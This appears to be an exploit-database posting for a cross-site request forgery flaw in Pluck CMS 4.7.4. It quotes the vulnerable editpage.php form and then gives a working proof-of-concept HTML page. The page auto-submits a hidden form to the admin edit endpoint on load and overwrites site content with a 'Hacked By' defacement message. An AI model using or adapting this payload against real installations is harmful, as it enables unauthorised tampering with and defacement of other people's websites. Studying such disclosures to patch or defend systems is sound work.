Home / exploits Pluck CMS 4.7.4 Cross Site Request Forgery
Posted on 15 August 2017
============================================== # Exploit Title : pluck-cms vulnerability CSRF # Reported Date : 8 - 10 - 2017 # Exploit Author : Ashiyane Digital Security Team # CWE: CSRF - 352 # Tested On : kali Linux # Vendor Homepage : https://www.pluck-cms.org/ # Software Link : https://github.com/pluck-cms/pluck/releases # Version : 4.7.4 ============================================== ----------------------------- vulnerability discovered by : Ehsan Cod3r , Und3rgr0und ----------------------------- vulnerability Path : http://127.0.0.1/PluckCMS/data/inc/editpage.php ----------------------------- vulnerability File: editpage.php ----------------------------- vulnerability Method : _GET[] ----------------------------- Vulnerability code : <form name="page_form" method="post" action=""> <p> <label class="kop2" for="title"><?php echo $lang['general']['title']; ?></label> <input name="title" id="title" type="text" value="<?php if (isset($_GET['page'])) echo $title; ?>" /> </p> <p><a href="#" class="kop2" onclick="return kadabra('seo-name');"><?php echo $lang['page']['seo_urls']; ?></a></p> <div id="seo-name" style="display: none;"> <input name="seo_name" id="seo_name" type="text" value="<?php if (isset($_GET['page'])) if (isset($seoname)) echo $seoname; else echo $title; ?>" /> </div> <label class="kop2" for="content-form"><?php echo $lang['general']['contents']; ?></label> <textarea class="<?php if (defined('WYSIWYG_TEXTAREA_CLASS')) echo WYSIWYG_TEXTAREA_CLASS; ?>" name="content" id="content-form" cols="70" rows="20"><?php if (isset($_GET['page'])) echo htmlspecialchars($content); ?></textarea> <div class="menudiv" style="width: 588px; margin-<?php if (DIRECTION_RTL) echo 'right'; else echo 'left'; ?>: 0;"> <p><a href="#" class="kop2" onclick="return kadabra('meta-options');"><?php echo $lang['editmeta']['title']; ?></a></p> <p class="kop4" style="margin-bottom: 5px;"><?php echo $lang['editmeta']['descr']; ?></p> <div id="meta-options" style="display: none;"> <label for="description"><?php echo $lang['general']['description']; ?></label> <br /> <textarea id="description" name="description" rows="2" cols="40" class="white"><?php if (isset($description)) echo $description; ?></textarea> <br /> <label for="keywords"><?php echo $lang['editmeta']['keywords']; ?></label> <br /> <span class="kop4"><?php echo $lang['editmeta']['comma']; ?></span> <br /> <textarea id="keywords" name="keywords" rows="1" cols="40" class="white"><?php if (isset($keywords)) echo $keywords; ?></textarea> </div> </div> <div class="menudiv" style="width: 588px; margin-<?php if (DIRECTION_RTL) echo 'right'; else echo 'left'; ?>: 0;"> <p><a href="#" class="kop2" onclick="return kadabra('other-options');"><?php echo $lang['general']['other_options']; ?></a></p> <p class="kop4" style="margin-bottom: 5px;"><?php echo $lang['page']['options']; ?></p> <div id="other-options" style="display: block;"> <table> <tr> <td><label for="hidden"><?php echo $lang['page']['in_menu']; ?></label><br /></td> <td><input type="checkbox" name="hidden" id="hidden" <?php if (!isset($_GET['page']) || $hidden == 'no') echo'checked="checked"'; ?> value="no" /></td> </tr> <tr> <td><label for="sub_page"><?php echo $lang['page']['sub_page']; ?></label></td> <td> <?php if (isset($_GET['page'])) show_subpage_select('sub_page', $_GET['page']); else show_subpage_select('sub_page'); ?></td> </tr> <?php run_hook('admin_save_page_beforepost'); ?> </table> </div> </div> <?php show_common_submits('?action=page', true); ?> </form> ============================================================================ Exploit code : <html> <body onload="document.exploit.submit()"> <form name="exploit" method="post" action=" http://localhost/1/PluckCMS/admin.php?action=editpage"> <input type="hidden" name="title" value="Hacked By Ehsan Cod3r"> <input type="hidden" name="seo_name" value=""> <input type="hidden" name="content" value="<h1>Hacked By Ehsan Cod3r"> <input type="hidden" name="description" value=""> <input type="hidden" name="keywords" value=""> <input type="hidden" name="hidden" value="no"> <input type="hidden" name="sub_page" value=""> <input type="hidden" name="theme" value="default"> <input type="hidden" name="save_exit" value="Save+and+Exit"> </form> </body> </html>
